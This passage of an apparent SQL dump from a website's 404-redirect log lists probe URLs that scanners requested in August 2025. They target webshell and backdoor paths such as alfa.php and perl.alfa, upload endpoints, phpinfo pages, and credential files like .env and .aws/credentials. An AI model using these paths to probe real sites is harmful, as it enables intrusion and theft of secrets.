00:00:00',301),(44885,'http://3s-technologies.com.tr/tr/admin/json.php',NULL,'','',1,0,'2025-08-15 17:23:07','0000-00-00 00:00:00',301),(44886,'http://3s-technologies.com.tr/tr/assets/images/readme.php',NULL,'','',1,0,'2025-08-15 17:23:08','0000-00-00 00:00:00',301),(44887,'http://3s-technologies.com.tr/tr/wp-includes/js/codemirror/makeasmtp.php',NULL,'','',1,0,'2025-08-15 17:23:09','0000-00-00 00:00:00',301),(44888,'http://3s-technologies.com.tr/tr/wp-content/themes/ben.php',NULL,'','',1,0,'2025-08-15 17:23:10','0000-00-00 00:00:00',301),(44889,'http://3s-technologies.com.tr/tr/wp-includes/blocks/moon.php',NULL,'','',1,0,'2025-08-15 17:23:11','0000-00-00 00:00:00',301),(44890,'http://3s-technologies.com.tr/tr/wp-content/uploads/readme.php',NULL,'','',1,0,'2025-08-15 17:23:12','0000-00-00 00:00:00',301),(44891,'http://3s-technologies.com.tr/tr/wp-content/plugins/hellopress/inputs.php',NULL,'','',1,0,'2025-08-15 17:23:13','0000-00-00 00:00:00',301),(44892,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/defaults.php',NULL,'','',1,0,'2025-08-15 17:23:14','0000-00-00 00:00:00',301),(44893,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/baxa1.php8',NULL,'','',1,0,'2025-08-15 17:23:15','0000-00-00 00:00:00',301),(44894,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/chosen.php',NULL,'','',1,0,'2025-08-15 17:23:16','0000-00-00 00:00:00',301),(44895,'http://3s-technologies.com.tr/tr/wp-content/upgrade-temp-backup/alfa.php',NULL,'','',1,0,'2025-08-15 17:23:17','0000-00-00 00:00:00',301),(44896,'http://3s-technologies.com.tr/tr/wp-includes/js/hydxrmgtbh.php',NULL,'','',1,0,'2025-08-15 17:23:18','0000-00-00 00:00:00',301),(44897,'http://3s-technologies.com.tr/tr/wp-content/uploads/2024/setup-config.php',NULL,'','',1,0,'2025-08-15 17:23:19','0000-00-00 00:00:00',301),(44898,'http://3s-technologies.com.tr/tr/.well-known/wp-damin.php',NULL,'','',1,0,'2025-08-15 17:23:20','0000-00-00 00:00:00',301),(44899,'http://3s-technologies.com.tr/tr/wp-admin/simple.php',NULL,'','',1,0,'2025-08-15 17:23:21','0000-00-00 00:00:00',301),(44900,'http://3s-technologies.com.tr/tr/wp-content/plugins/seoplugins/fm.php',NULL,'','',1,0,'2025-08-15 17:23:22','0000-00-00 00:00:00',301),(44901,'http://3s-technologies.com.tr/tr/admin/class.php',NULL,'','',1,0,'2025-08-15 17:23:22','0000-00-00 00:00:00',301),(44902,'http://3s-technologies.com.tr/tr/wp-includes/style-engine/gecko-litespeed.php',NULL,'','',1,0,'2025-08-15 17:23:23','0000-00-00 00:00:00',301),(44903,'http://3s-technologies.com.tr/tr/wp-content/uploads/2024/cong.php',NULL,'','',1,0,'2025-08-15 17:23:24','0000-00-00 00:00:00',301),(44904,'http://3s-technologies.com.tr/tr/wp-includes/style-engine/fucku.php',NULL,'','',1,0,'2025-08-15 17:23:25','0000-00-00 00:00:00',301),(44905,'http://3s-technologies.com.tr/tr/wp-includes/blocks/mah.php',NULL,'','',1,0,'2025-08-15 17:23:26','0000-00-00 00:00:00',301),(44906,'http://3s-technologies.com.tr/tr/wp-includes/pomo/mah.php',NULL,'','',1,0,'2025-08-15 17:23:27','0000-00-00 00:00:00',301),(44907,'http://3s-technologies.com.tr/tr/wp-admin/includes/packed.php',NULL,'','',1,0,'2025-08-15 17:23:28','0000-00-00 00:00:00',301),(44908,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/media.php.infected.php',NULL,'','',1,0,'2025-08-15 17:23:29','0000-00-00 00:00:00',301),(44909,'http://3s-technologies.com.tr/tr/img/upload.php',NULL,'','',1,0,'2025-08-15 17:23:30','0000-00-00 00:00:00',301),(44910,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/wp-mail.php',NULL,'','',1,0,'2025-08-15 17:23:31','0000-00-00 00:00:00',301),(44911,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/text.php',NULL,'','',1,0,'2025-08-15 17:23:32','0000-00-00 00:00:00',301),(44912,'http://3s-technologies.com.tr/tr/wp-admin/maint/chosen.php',NULL,'','',3,0,'2025-08-15 17:23:32','0000-00-00 00:00:00',301),(44913,'http://3s-technologies.com.tr/tr/update/wp-conflg.php',NULL,'','',1,0,'2025-08-15 17:23:33','0000-00-00 00:00:00',301),(44914,'http://3s-technologies.com.tr/tr/img/dropdown.php',NULL,'','',1,0,'2025-08-15 17:23:34','0000-00-00 00:00:00',301),(44915,'http://3s-technologies.com.tr/tr/js/chosen.php',NULL,'','',1,0,'2025-08-15 17:23:36','0000-00-00 00:00:00',301),(44916,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/ürünler\n',NULL,'','',2,0,'2025-08-15 18:06:28','0000-00-00 00:00:00',301),(44917,'http://www.3s-technologies.com.tr/tr/en',NULL,'','',2,0,'2025-08-15 20:13:25','0000-00-00 00:00:00',301),(44918,'http://3s-technologies.com.tr/tr/z2.php',NULL,'','',1,0,'2025-08-16 01:23:23','0000-00-00 00:00:00',301),(44919,'http://3s-technologies.com.tr/tr/z3.php',NULL,'','',1,0,'2025-08-16 01:23:23','0000-00-00 00:00:00',301),(44920,'http://3s-technologies.com.tr/tr/z4.php',NULL,'','',1,0,'2025-08-16 01:23:24','0000-00-00 00:00:00',301),(44921,'http://3s-technologies.com.tr/tr/z5.php',NULL,'','',1,0,'2025-08-16 01:23:25','0000-00-00 00:00:00',301),(44922,'http://3s-technologies.com.tr/tr/x1.php',NULL,'','',14,0,'2025-08-16 01:23:25','0000-00-00 00:00:00',301),(44923,'http://3s-technologies.com.tr/tr/a11.php',NULL,'','',1,0,'2025-08-16 01:24:02','0000-00-00 00:00:00',301),(44924,'http://3s-technologies.com.tr/tr/a12.php',NULL,'','',1,0,'2025-08-16 01:24:02','0000-00-00 00:00:00',301),(44925,'http://3s-technologies.com.tr/tr/g1.php',NULL,'','',7,0,'2025-08-16 01:24:03','0000-00-00 00:00:00',301),(44926,'http://3s-technologies.com.tr/tr/g2.php',NULL,'','',1,0,'2025-08-16 01:24:03','0000-00-00 00:00:00',301),(44927,'http://3s-technologies.com.tr/tr/g3.php',NULL,'','',5,0,'2025-08-16 01:24:04','0000-00-00 00:00:00',301),(44928,'http://3s-technologies.com.tr/tr/g4.php',NULL,'','',1,0,'2025-08-16 01:24:05','0000-00-00 00:00:00',301),(44929,'http://3s-technologies.com.tr/tr/g8.php',NULL,'','',1,0,'2025-08-16 01:24:05','0000-00-00 00:00:00',301),(44930,'http://3s-technologies.com.tr/tr/g9.php',NULL,'','',1,0,'2025-08-16 01:24:06','0000-00-00 00:00:00',301),(44931,'http://3s-technologies.com.tr/tr/g10.php',NULL,'','',1,0,'2025-08-16 01:24:06','0000-00-00 00:00:00',301),(44932,'http://3s-technologies.com.tr/tr/v8.php',NULL,'','',1,0,'2025-08-16 01:24:12','0000-00-00 00:00:00',301),(44933,'http://3s-technologies.com.tr/tr/joomla/plugins/content/jw_allvideos/players/wmvplayer.js',NULL,'','',2,0,'2025-08-16 03:53:42','0000-00-00 00:00:00',301),(44934,'https://3s-technologies.com.tr/tr/joomla/plugins/content/jw_allvideos/players/wmvplayer.js',NULL,'','',2,0,'2025-08-16 03:53:59','0000-00-00 00:00:00',301),(44935,'http://3s-technologies.com.tr/tr/inaatech.com/file.php',NULL,'','',1,0,'2025-08-16 12:00:51','0000-00-00 00:00:00',301),(44936,'http://3s-technologies.com.tr/tr/artispedia.web.id/file.php',NULL,'','',1,0,'2025-08-16 12:00:55','0000-00-00 00:00:00',301),(44937,'http://3s-technologies.com.tr/tr/dx.kotora.co.jp/file.php',NULL,'','',1,0,'2025-08-16 12:00:59','0000-00-00 00:00:00',301),(44938,'http://3s-technologies.com.tr/tr/braysoakslandscape.com/wp-includes/html-api/chosen.',NULL,'','',1,0,'2025-08-16 12:01:13','0000-00-00 00:00:00',301),(44939,'http://3s-technologies.com.tr/tr/kampungkopirigisjaya.com/makeasmtp.php?p=',NULL,'','',1,0,'2025-08-16 12:01:27','0000-00-00 00:00:00',301),(44940,'http://3s-technologies.com.tr/tr/vrsul.com.br/config.php',NULL,'','',1,0,'2025-08-16 12:01:28','0000-00-00 00:00:00',301),(44941,'http://3s-technologies.com.tr/tr/wp-includes/style-engine/index.php/wp-includes/fonts/index.php?p=',NULL,'','',1,0,'2025-08-16 12:01:28','0000-00-00 00:00:00',301),(44942,'http://3s-technologies.com.tr/tr/the-taste.at/wp-admin/js/chosen.php',NULL,'','',1,0,'2025-08-16 12:01:30','0000-00-00 00:00:00',301),(44943,'http://3s-technologies.com.tr/tr/cwp.com.pk/file.php',NULL,'','',1,0,'2025-08-16 12:01:34','0000-00-00 00:00:00',301),(44944,'http://3s-technologies.com.tr/tr/luckycompanysas.com.co/alfa.php',NULL,'','',1,0,'2025-08-16 12:01:44','0000-00-00 00:00:00',301),(44945,'http://3s-technologies.com.tr/tr/socialbytz.com/alfa.php',NULL,'','',1,0,'2025-08-16 12:01:47','0000-00-00 00:00:00',301),(44946,'https://www.3s-technologies.com.tr/tr/f/255361/267x150/4c7521adf1/webpage-svg.svg',NULL,'https://www.3s-technologies.com.tr/f/255361/267x150/4c7521adf1/webpage-svg.svg','',4,0,'2025-08-16 15:49:17','0000-00-00 00:00:00',301),(44947,'https://3s-technologies.com.tr/tr/f/255361/267x150/4c7521adf1/webpage-svg.svg',NULL,'https://3s-technologies.com.tr/f/255361/267x150/4c7521adf1/webpage-svg.svg','',4,0,'2025-08-16 15:49:17','0000-00-00 00:00:00',301),(44948,'http://3s-technologies.com.tr/tr/debugger.php',NULL,'','',1,0,'2025-08-17 06:59:28','0000-00-00 00:00:00',301),(44949,'http://3s-technologies.com.tr/tr/public/phpinfo.php',NULL,'','',1,0,'2025-08-17 06:59:29','0000-00-00 00:00:00',301),(44950,'http://3s-technologies.com.tr/tr/phpversion',NULL,'','',1,0,'2025-08-17 06:59:30','0000-00-00 00:00:00',301),(44951,'http://3s-technologies.com.tr/tr/test_info.php',NULL,'','',3,0,'2025-08-17 06:59:31','0000-00-00 00:00:00',301),(44952,'http://3s-technologies.com.tr/tr/var/www/html/phpinfo.php',NULL,'','',1,0,'2025-08-17 06:59:32','0000-00-00 00:00:00',301),(44953,'http://3s-technologies.com.tr/tr/private/phpinfo.php',NULL,'','',1,0,'2025-08-17 06:59:33','0000-00-00 00:00:00',301),(44954,'http://3s-technologies.com.tr/tr/api/.env/.env.development',NULL,'','',1,0,'2025-08-17 06:59:37','0000-00-00 00:00:00',301),(44955,'http://3s-technologies.com.tr/tr/config/.env.production',NULL,'','',1,0,'2025-08-17 06:59:38','0000-00-00 00:00:00',301),(44956,'http://3s-technologies.com.tr/tr/var/www/.env',NULL,'','',1,0,'2025-08-17 06:59:39','0000-00-00 00:00:00',301),(44957,'http://3s-technologies.com.tr/tr/config/.env.local',NULL,'','',1,0,'2025-08-17 06:59:41','0000-00-00 00:00:00',301),(44958,'http://3s-technologies.com.tr/tr/.aws/credentials/uploads',NULL,'','',1,0,'2025-08-17 06:59:48','0000-00-00 00:00:00',301),(44959,'http://3s-technologies.com.tr/tr/.github',NULL,'','',1,0,'2025-08-17 06:59:50','0000-00-00 00:00:00',301),(44960,'http://3s-technologies.com.tr/tr/req.php',NULL,'','',3,0,'2025-08-17 19:20:59','0000-00-00 00:00:00',301),(44961,'http://3s-technologies.com.tr/tr/s3.php',NULL,'','',2,0,'2025-08-17 19:21:01','0000-00-00 00:00:00',301),(44962,'http://3s-technologies.com.tr/tr/af.php',NULL,'','',1,0,'2025-08-17 19:21:46','0000-00-00 00:00:00',301),(44963,'http://3s-technologies.com.tr/tr/ag.php',NULL,'','',1,0,'2025-08-17 19:21:47','0000-00-00 00:00:00',301),(44964,'http://3s-technologies.com.tr/tr/ah.php',NULL,'','',3,0,'2025-08-17 19:21:47','0000-00-00 00:00:00',301),(44965,'http://3s-technologies.com.tr/tr/ai.php',NULL,'','',10,0,'2025-08-17 19:21:48','0000-00-00 00:00:00',301),(44966,'http://3s-technologies.com.tr/tr/aj.php',NULL,'','',11,0,'2025-08-17 19:21:49','0000-00-00 00:00:00',301),(44967,'http://3s-technologies.com.tr/tr/ak.php',NULL,'','',16,0,'2025-08-17 19:21:50','0000-00-00 00:00:00',301),(44968,'http://3s-technologies.com.tr/tr/ao.php',NULL,'','',1,0,'2025-08-17 19:21:52','0000-00-00 00:00:00',301),(44969,'http://3s-technologies.com.tr/tr/ap.php',NULL,'','',5,0,'2025-08-17 19:21:53','0000-00-00 00:00:00',301),(44970,'http://3s-technologies.com.tr/tr/aq.php',NULL,'','',15,0,'2025-08-17 19:21:54','0000-00-00 00:00:00',301),(44971,'http://3s-technologies.com.tr/tr/at.php',NULL,'','',5,0,'2025-08-17 19:21:55','0000-00-00 00:00:00',301),(44972,'http://3s-technologies.com.tr/tr/au.php',NULL,'','',1,0,'2025-08-17 19:21:56','0000-00-00 00:00:00',301),(44973,'http://3s-technologies.com.tr/tr/ax.php',NULL,'','',4,0,'2025-08-17 19:21:56','0000-00-00 00:00:00',301),(44974,'http://3s-technologies.com.tr/tr/usb.php',NULL,'','',1,0,'2025-08-17 19:22:06','0000-00-00 00:00:00',301),(44975,'http://3s-technologies.com.tr/tr/mi.php',NULL,'','',1,0,'2025-08-17 19:22:07','0000-00-00 00:00:00',301),(44976,'http://3s-technologies.com.tr/tr/789.php',NULL,'','',1,0,'2025-08-17 19:22:07','0000-00-00 00:00:00',301),(44977,'http://3s-technologies.com.tr/tr/tz.php',NULL,'','',1,0,'2025-08-17 19:22:09','0000-00-00 00:00:00',301),(44978,'http://3s-technologies.com.tr/tr/bot/php.php',NULL,'','',1,0,'2025-08-17 19:22:09','0000-00-00 00:00:00',301),(44979,'http://3s-technologies.com.tr/tr/com.php',NULL,'','',14,0,'2025-08-17 19:22:11','0000-00-00 00:00:00',301),(44980,'http://3s-technologies.com.tr/tr/tu.php',NULL,'','',1,0,'2025-08-17 19:22:17','0000-00-00 00:00:00',301),(44981,'http://3s-technologies.com.tr/tr/th.php',NULL,'','',1,0,'2025-08-17 19:22:18','0000-00-00 00:00:00',301),(44982,'http://3s-technologies.com.tr/tr/fr.php',NULL,'','',2,0,'2025-08-17 19:22:19','0000-00-00 00:00:00',301),(44983,'http://3s-technologies.com.tr/tr/pass.php',NULL,'','',36,0,'2025-08-17 19:22:24','0000-00-00 00:00:00',301),(44984,'http://3s-technologies.com.tr/tr/omg.php',NULL,'','',1,0,'2025-08-17 19:22:25','0000-00-00 00:00:00',301),(44985,'http://3s-technologies.com.tr/tr/you.php',NULL,'','',5,0,'2025-08-17 19:22:26','0000-00-00 00:00:00',301),(44986,'http://3s-technologies.com.tr/tr/acc.php',NULL,'','',16,0,'2025-08-17 19:22:27','0000-00-00 00:00:00',301),(44987,'http://3s-technologies.com.tr/tr/bal.php',NULL,'','',57,0,'2025-08-17 19:22:27','0000-00-00 00:00:00',301),(44988,'http://3s-technologies.com.tr/tr/doll.php',NULL,'','',2,0,'2025-08-17 19:22:28','0000-00-00 00:00:00',301),(44989,'http://3s-technologies.com.tr/tr/no.php',NULL,'','',1,0,'2025-08-17 19:22:29','0000-00-00 00:00:00',301),(44990,'http://3s-technologies.com.tr/tr/yes.php',NULL,'','',9,0,'2025-08-17 19:22:29','0000-00-00 00:00:00',301),(44991,'http://3s-technologies.com.tr/tr/pen.php',NULL,'','',1,0,'2025-08-17 19:22:30','0000-00-00 00:00:00',301),(44992,'http://3s-technologies.com.tr/tr/de.php',NULL,'','',14,0,'2025-08-17 19:22:31','0000-00-00 00:00:00',301),(44993,'http://3s-technologies.com.tr/tr/mcc.php',NULL,'','',1,0,'2025-08-17 19:22:31','0000-00-00 00:00:00',301),(44994,'http://3s-technologies.com.tr/tr/keys.php',NULL,'','',2,0,'2025-08-17 19:22:35','0000-00-00 00:00:00',301),(44995,'http://3s-technologies.com.tr/tr/summary.php',NULL,'','',2,0,'2025-08-17 19:22:36','0000-00-00 00:00:00',301),(44996,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/dalga-lehimleme\n',NULL,'','',2,0,'2025-08-18 00:41:10','0000-00-00 00:00:00',301),(44997,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/hakkımızda\n',NULL,'','',2,0,'2025-08-18 03:07:15','0000-00-00 00:00:00',301),(44998,'http://3s-technologies.com.tr/tr/ot.php',NULL,'','',31,0,'2025-08-18 08:02:09','0000-00-00 00:00:00',301),(44999,'http://www.3s-technologies.com.tr/tr/alfa_data/alfacgiapi/perl.alfa',NULL,'','',4,0,'2025-08-18 09:17:48','0000-00-00 00:00:00',301),(45000,'http://www.3s-technologies.com.tr/tr/wp-content/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2025-08-18 09:17:49','0000-00-00 00:00:00',301),(45001,'http://www.3s-technologies.com.tr/tr/wp-plugins/alfa_data/alfacgiapi/perl.alfa',NULL,'','',1,0,'2025-08-18 09:17:50','0000-00-00 00:00:00',301),(45002,'http://www.3s-technologies.com.tr/tr/wp-admin/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2025-08-18 09:17:51','0000-00-00 00:00:00',301),(45003,'http://www.3s-technologies.com.tr/tr/ckeditor/kcfinder/browse.php',NULL,'','',1,0,'2025-08-18 09:17:52','0000-00-00 00:00:00',301),(45004,'http://www.3s-technologies.com.tr/tr/kcfinder/browse.php',NULL,'','',1,0,'2025-08-18 09:17:53','0000-00-00 00:00:00',301),(45005,'http://www.3s-technologies.com.tr/tr/assets/filemanager/dialog.php?akey=gantikuncidesa',NULL,'','',1,0,'2025-08-18 09:17:56','0000-00-00 00:00:00',301),(45006,'http://www.3s-technologies.com.tr/tr/server/php',NULL,'','',1,0,'2025-08-18 09:17:57','0000-00-00 00:00:00',301),(45007,'http://www.3s-technologies.com.tr/tr/backend/upload.php',NULL,'','',1,0,'2025-08-18 09:17:58','0000-00-00 00:00:00',301),(45008,'http://www.3s-technologies.com.tr/tr/uploadify/uploadify.php',NULL,'','',1,0,'2025-08-18 09:18:01','0000-00-00 00:00:00',301),(45009,'http://www.3s-technologies.com.tr/tr/wp/wp-admin.install.php',NULL,'','',1,0,'2025-08-18 09:18:02','0000-00-00 00:00:00',301),(45010,'http://www.3s-technologies.com.tr/tr/wordpress/wp-admin.php',NULL,'','',1,0,'2025-08-18 09:18:02','0000-00-00 00:00:00',301),(45011,'https://www.3s-technologies.com.tr/tr/i/filters:quality(60)/f/255361/267x150/4c7521adf1/webpage-svg.svg',NULL,'https://www.3s-technologies.com.tr/i/filters:quality(60)/f/255361/267x150/4c7521adf1/webpage-svg.svg','',4,0,'2025-08-18 10:12:08','0000-00-00 00:00:00',301),(45012,'http://3s-technologies.com.tr/tr/moon.php=',NULL,'','',2,0,'2025-08-18 14:47:15','0000-00-00 00:00:00',301),(45013,'http://3s-technologies.com.tr/tr/save.php',NULL,'','',7,0,'2025-08-18 14:47:31','0000-00-00 00:00:00',301),(45014,'http://3s-technologies.com.tr/tr/goto.php',NULL,'','',2,0,'2025-08-18 14:47:39','0000-00-00 00:00:00',301),(45015,'http://3s-technologies.com.tr/tr/el.php',NULL,'','',1,0,'2025-08-18 14:47:40','0000-00-00 00:00:00',301),(45016,'http://3s-technologies.com.tr/tr/fwe.php',NULL,'','',48,0,'2025-08-18 14:47:45','0000-00-00 00:00:00',301),(45017,'http://3s-technologies.com.tr/tr/cs.php',NULL,'','',19,0,'2025-08-18 14:47:46','0000-00-00 00:00:00',301),(45018,'http://3s-technologies.com.tr/tr/acces.php',NULL,'','',2,0,'2025-08-18 14:47:47','0000-00-00 00:00:00',301),(45019,'http://3s-technologies.com.tr/tr/audio.php',NULL,'','',1,0,'2025-08-18 14:48:01','0000-00-00 00:00:00',301),(45020,'http://3s-technologies.com.tr/tr/finance.php',NULL,'','',1,0,'2025-08-18 14:48:03','0000-00-00 00:00:00',301),(45021,'http://3s-technologies.com.tr/tr/autoload.php',NULL,'','',2,0,'2025-08-18 14:48:04','0000-00-00 00:00:00',301),(45022,'http://3s-technologies.com.tr/tr/live.php',NULL,'','',3,0,'2025-08-18 14:48:07','0000-00-00 00:00:00',301),(45023,'http://3s-technologies.com.tr/tr/null.php',NULL,'','',1,0,'2025-08-18 14:48:08','0000-00-00 00:00:00',301),(45024,'http://3s-technologies.com.tr/tr/pay.php',NULL,'','',1,0,'2025-08-18 14:48:08','0000-00-00 00:00:00',301),(45025,'http://3s-technologies.com.tr/tr/run.php',NULL,'','',5,0,'2025-08-18 14:48:09','0000-00-00 00:00:00',301),(45026,'http://3s-technologies.com.tr/tr/sales.php',NULL,'','',1,0,'2025-08-18 14:48:10','0000-00-00 00:00:00',301),(45027,'http://3s-technologies.com.tr/tr/src.php',NULL,'','',2,0,'2025-08-18 14:48:11','0000-00-00 00:00:00',301),(45028,'http://3s-technologies.com.tr/tr/success.php',NULL,'','',4,0,'2025-08-18 14:48:12','0000-00-00 00:00:00',301),(45029,'http://3s-technologies.com.tr/tr/sync.php',NULL,'','',1,0,'2025-08-18 14:48:12','0000-00-00 00:00:00',301),(45030,'http://3s-technologies.com.tr/tr/tmp.php',NULL,'','',26,0,'2025-08-18 14:48:13','0000-00-00 00:00:00',301),(45031,'http://3s-technologies.com.tr/tr/todo.php',NULL,'','',1,0,'2025-08-18 14:48:14','0000-00-00 00:00:00',301),(45032,'http://3s-technologies.com.tr/tr/vars.php',NULL,'','',1,0,'2025-08-18 14:48:15','0000-00-00 00:00:00',301),(45033,'http://3s-technologies.com.tr/tr/work.php',NULL,'','',5,0,'2025-08-18 14:48:16','0000-00-00 00:00:00',301),(45034,'http://3s-technologies.com.tr/tr/zone.php',NULL,'','',4,0,'2025-08-18 14:48:17','0000-00-00 00:00:00',301),(45035,'http://3s-technologies.com.tr/tr/xleet',NULL,'','',8,0,'2025-08-18 22:35:14','0000-00-00 00:00:00',301),(45036,'http://3s-technologies.com.tr/tr/filled.php',NULL,'','',2,0,'2025-08-19 02:21:52','0000-00-00 00:00:00',301),(45037,'http://3s-technologies.com.tr/tr/img/dot.php',NULL,'','',4,0,'2025-08-19 02:21:53','0000-00-00 00:00:00',301),(45038,'http://3s-technologies.com.tr/tr/main/info.php',NULL,'','',1,0,'2025-08-19 02:22:00','0000-00-00 00:00:00',301),(45039,'http://3s-technologies.com.tr/tr/bot/info.php',NULL,'','',1,0,'2025-08-19 02:22:03','0000-00-00 00:00:00',301),(45040,'http://3s-technologies.com.tr/tr/app/time.php',NULL,'','',1,0,'2025-08-19 02:22:04','0000-00-00 00:00:00',301),(45041,'http://3s-technologies.com.tr/tr/admin/config.php',NULL,'','',1,0,'2025-08-19 02:22:05','0000-00-00 00:00:00',301),(45042,'http://3s-technologies.com.tr/tr/node/time.php',NULL,'','',1,0,'2025-08-19 02:22:06','0000-00-00 00:00:00',301),(45043,'http://3s-technologies.com.tr/tr/search/s.php',NULL,'','',1,0,'2025-08-19 02:22:09','0000-00-00 00:00:00',301),(45044,'http://3s-technologies.com.tr/tr/live/i.php',NULL,'','',1,0,'2025-08-19 02:22:10','0000-00-00 00:00:00',301),(45045,'http://3s-technologies.com.tr/tr/wh/glass.php',NULL,'','',1,0,'2025-08-19 02:22:11','0000-00-00 00:00:00',301),(45046,'http://3s-technologies.com.tr/tr/nation.php',NULL,'','',2,0,'2025-08-19 02:22:12','0000-00-00 00:00:00',301),(45047,'http://3s-technologies.com.tr/tr/status.php',NULL,'','',15,0,'2025-08-19 02:22:13','0000-00-00 00:00:00',301),(45048,'http://3s-technologies.com.tr/tr/.__info.php',NULL,'','',6,0,'2025-08-19 02:22:14','0000-00-00 00:00:00',301),(45049,'http://3s-technologies.com.tr/tr/dummy.php',NULL,'','',1,0,'2025-08-19 02:22:15','0000-00-00 00:00:00',301),(45050,'http://3s-technologies.com.tr/tr/sample/phpinfo.php',NULL,'','',1,0,'2025-08-19 02:22:17','0000-00-00 00:00:00',301),(45051,'http://3s-technologies.com.tr/tr/moadmin.php',NULL,'','',1,0,'2025-08-19 02:22:19','0000-00-00 00:00:00',301),(45052,'http://3s-technologies.com.tr/tr/cron/temp.php',NULL,'','',1,0,'2025-08-19 02:22:20','0000-00-00 00:00:00',301),(45053,'http://3s-technologies.com.tr/tr/d0main.php',NULL,'','',2,0,'2025-08-19 02:22:21','0000-00-00 00:00:00',301),(45054,'http://3s-technologies.com.tr/tr/xm.php',NULL,'','',5,0,'2025-08-19 02:22:24','0000-00-00 00:00:00',301),(45055,'http://3s-technologies.com.tr/tr/health.php',NULL,'','',3,0,'2025-08-19 02:22:29','0000-00-00 00:00:00',301),(45056,'http://3s-technologies.com.tr/tr/ghi.php',NULL,'','',1,0,'2025-08-19 02:22:30','0000-00-00 00:00:00',301),(45057,'http://3s-technologies.com.tr/tr/ids.php',NULL,'','',2,0,'2025-08-19 02:22:32','0000-00-00 00:00:00',301),(45058,'http://3s-technologies.com.tr/tr/ucp.php',NULL,'','',7,0,'2025-08-19 02:22:34','0000-00-00 00:00:00',301),(45059,'http://3s-technologies.com.tr/tr/wp-title.php',NULL,'','',4,0,'2025-08-19 02:22:35','0000-00-00 00:00:00',301),(45060,'http://3s-technologies.com.tr/tr/old/php.php',NULL,'','',1,0,'2025-08-19 02:22:38','0000-00-00 00:00:00',301),(45061,'http://3s-technologies.com.tr/tr/test/test.php',NULL,'','',2,0,'2025-08-19 02:22:39','0000-00-00 00:00:00',301),(45062,'http://3s-technologies.com.tr/tr/zxcv.php',NULL,'','',2,0,'2025-08-19 02:22:40','0000-00-00 00:00:00',301),(45063,'http://3s-technologies.com.tr/tr/xyz.php',NULL,'','',3,0,'2025-08-19 02:22:41','0000-00-00 00:00:00',301),(45064,'http://3s-technologies.com.tr/tr/ssa.php',NULL,'','',1,0,'2025-08-19 02:22:42','0000-00-00 00:00:00',301),(45065,'http://3s-technologies.com.tr/tr/use.php',NULL,'','',5,0,'2025-08-19 02:22:43','0000-00-00 00:00:00',301),(45066,'http://3s-technologies.com.tr/tr/dep.php',NULL,'','',1,0,'2025-08-19 02:22:44','0000-00-00 00:00:00',301),(45067,'http://3s-technologies.com.tr/tr/jkl.php',NULL,'','',1,0,'2025-08-19 02:22:47','0000-00-00 00:00:00',301),(45068,'http://3s-technologies.com.tr/tr/0o.php',NULL,'','',2,0,'2025-08-19 02:22:48','0000-00-00 00:00:00',301),(45069,'http://3s-technologies.com.tr/tr/admin404.php',NULL,'','',4,0,'2025-08-19 02:22:49','0000-00-00 00:00:00',301),(45070,'http://3s-technologies.com.tr/tr/ern1.php',NULL,'','',1,0,'2025-08-19 02:22:51','0000-00-00 00:00:00',301),(45071,'http://3s-technologies.com.tr/tr/envs.php',NULL,'','',2,0,'2025-08-19 02:22:56','0000-00-00 00:00:00',301),(45072,'http://3s-technologies.com.tr/tr/bbb.php',NULL,'','',1,0,'2025-08-19 02:22:57','0000-00-00 00:00:00',301),(45073,'http://3s-technologies.com.tr/tr/vwx.php',NULL,'','',1,0,'2025-08-19 02:22:58','0000-00-00 00:00:00',301),(45074,'http://3s-technologies.com.tr/tr/fedora.php',NULL,'','',2,0,'2025-08-19 02:22:59','0000-00-00 00:00:00',301),(45075,'http://3s-technologies.com.tr/tr/cocot.php',NULL,'','',1,0,'2025-08-19 02:23:03','0000-00-00 00:00:00',301),(45076,'http://3s-technologies.com.tr/tr/400.php',NULL,'','',1,0,'2025-08-19 02:23:57','0000-00-00 00:00:00',301),(45077,'http://3s-technologies.com.tr/tr/wp-includes/option-more.php',NULL,'','',1,0,'2025-08-19 03:09:31','0000-00-00 00:00:00',301),(45078,'http://3s-technologies.com.tr/tr/wp-includes/widgets/class-wp-widget-links-database.php',NULL,'','',1,0,'2025-08-19 03:09:33','0000-00-00 00:00:00',301),(45079,'http://3s-technologies.com.tr/tr/wp-content/cache/data.php',NULL,'','',1,0,'2025-08-19 03:09:34','0000-00-00 00:00:00',301),(45080,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-recovery-mode-key-service-add.php',NULL,'','',1,0,'2025-08-19 03:09:35','0000-00-00 00:00:00',301),(45081,'http://3s-technologies.com.tr/tr/wp-admin/images/mhbgf.php/wp-cron.php',NULL,'','',1,0,'2025-08-19 03:09:36','0000-00-00 00:00:00',301),(45082,'http://3s-technologies.com.tr/tr/wp-admin/user-new.php',NULL,'','',7,0,'2025-08-19 03:09:37','0000-00-00 00:00:00',301),(45083,'http://3s-technologies.com.tr/tr/wp-content/plugins/cache/cache.php/wp-admin/wp-cron.php',NULL,'','',1,0,'2025-08-19 03:09:38','0000-00-00 00:00:00',301),(45084,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-oembed-beta.php',NULL,'','',1,0,'2025-08-19 03:09:39','0000-00-00 00:00:00',301),(45085,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-paused-extensions-storage-num.php',NULL,'','',1,0,'2025-08-19 03:09:40','0000-00-00 00:00:00',301),(45086,'http://3s-technologies.com.tr/tr/wp-content/cache/wp-post-data.php',NULL,'','',1,0,'2025-08-19 03:09:41','0000-00-00 00:00:00',301),(45087,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-date-query-beta.php',NULL,'','',1,0,'2025-08-19 03:09:43','0000-00-00 00:00:00',301),(45088,'http://3s-technologies.com.tr/tr/wp-content/plugins/nexusbot/nexusleads.php',NULL,'','',1,0,'2025-08-19 03:09:47','0000-00-00 00:00:00',301),(45089,'http://3s-technologies.com.tr/tr/images/uploadform.php',NULL,'','',1,0,'2025-08-19 03:09:48','0000-00-00 